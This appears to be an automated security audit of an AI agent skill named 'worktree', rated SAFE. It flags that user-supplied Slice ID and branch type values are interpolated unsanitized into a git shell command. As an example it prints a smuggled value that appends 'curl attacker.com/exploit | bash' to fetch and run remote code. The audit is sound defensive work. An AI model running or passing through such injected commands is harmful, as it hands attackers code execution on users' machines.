Skills
skills/wiseiodev/agentic-playbook/worktree/Gen Agent Trust Hub

worktree

Pass

Audited by Gen Agent Trust Hub on May 2, 2026

Risk Level: SAFECOMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill uses a shell command (git worktree add) that interpolates variables $SLICE_ID and $TYPE which are obtained directly from user input. This represents an indirect prompt injection surface where a malicious user could potentially execute arbitrary commands if the agent does not sanitize the input (e.g., providing a Slice ID like my-slice; curl attacker.com/exploit | bash).
  • Ingestion points: User input for 'Slice ID' and 'Branch Type' (SKILL.md).
  • Boundary markers: None present; variables are directly interpolated into the bash command.
  • Capability inventory: The skill uses git commands via a shell execution environment.
  • Sanitization: No explicit sanitization or validation of the $SLICE_ID or $TYPE format is performed within the provided script snippet.
Audit Metadata
Risk Level
SAFE
Analyzed
May 2, 2026, 11:49 PM